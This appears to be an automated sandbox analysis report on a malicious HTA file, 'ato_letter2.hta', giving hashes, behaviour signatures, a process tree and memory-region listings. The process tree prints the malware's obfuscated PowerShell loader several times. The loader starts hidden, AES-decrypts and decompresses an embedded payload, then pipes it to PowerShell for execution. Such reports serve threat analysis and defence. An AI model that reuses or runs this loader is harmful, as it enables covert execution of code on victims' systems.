Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    10-01-2024 21:28

General

  • Target

    163.5.169.28/ato_letter2.hta

  • Size

    1.1MB

  • MD5

    54ff1471d93aa84c94efd8cbae4c6c78

  • SHA1

    11c7d8cd8e02b27aee846c353c32b114a7daa3bf

  • SHA256

    e1869d3a88c9190cf43014e3cb48562fc220ff7f6d5baed77c7dfa1c84c5d530

  • SHA512

    5eed6c7f0ffc27e96349fa8fc7c959e87ff35561da2b811f2e59c0fa0bd42f53debd4079da4c1df133b8211c38ef48f03b3f8b5471370bcf6ed79d240fdde804

  • SSDEEP

    1536:SwxapK31kELNEZ1fos0mr/l1vcmafSIm+lIWFR9UU5gou0gQixFaVEYkEOvMXu+f:SOapK31RBEDws7g

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\ato_letter2.hta"
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2200
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn | powershell - }
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2364
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn | powershell -
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2280
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2788
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2772

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    8ebfdb5a2c991628df1b89fa49d52605

    SHA1

    3e4dfb698d33f2bc9b179190ed6b51fa790fc4b3

    SHA256

    d94370c5b2959031a3abfb8426b0c6774933e4b39f2616839ed3576ff0f3a71d

    SHA512

    c1e2df04833c90558e872fd37b233421a85199d22c1f2cec58c4044816186023207585c7650425165c9b4109e6586d6f56edb3662f7ff52754a72f9609de3084

  • memory/2364-2-0x0000000071FE0000-0x000000007258B000-memory.dmp

    Filesize

    5.7MB

  • memory/2364-5-0x00000000025A0000-0x00000000025E0000-memory.dmp

    Filesize

    256KB

  • memory/2364-4-0x00000000025A0000-0x00000000025E0000-memory.dmp

    Filesize

    256KB

  • memory/2364-3-0x0000000071FE0000-0x000000007258B000-memory.dmp

    Filesize

    5.7MB

  • memory/2364-6-0x0000000071FE0000-0x000000007258B000-memory.dmp

    Filesize

    5.7MB

  • memory/2772-23-0x0000000002570000-0x00000000025B0000-memory.dmp

    Filesize

    256KB

  • memory/2772-17-0x0000000071A30000-0x0000000071FDB000-memory.dmp

    Filesize

    5.7MB

  • memory/2772-25-0x0000000002570000-0x00000000025B0000-memory.dmp

    Filesize

    256KB

  • memory/2772-18-0x0000000002570000-0x00000000025B0000-memory.dmp

    Filesize

    256KB

  • memory/2772-20-0x0000000071A30000-0x0000000071FDB000-memory.dmp

    Filesize

    5.7MB

  • memory/2772-35-0x0000000071A30000-0x0000000071FDB000-memory.dmp

    Filesize

    5.7MB

  • memory/2788-19-0x0000000071A30000-0x0000000071FDB000-memory.dmp

    Filesize

    5.7MB

  • memory/2788-22-0x0000000002480000-0x00000000024C0000-memory.dmp

    Filesize

    256KB

  • memory/2788-24-0x0000000002480000-0x00000000024C0000-memory.dmp

    Filesize

    256KB

  • memory/2788-21-0x0000000002480000-0x00000000024C0000-memory.dmp

    Filesize

    256KB

  • memory/2788-36-0x0000000071A30000-0x0000000071FDB000-memory.dmp

    Filesize

    5.7MB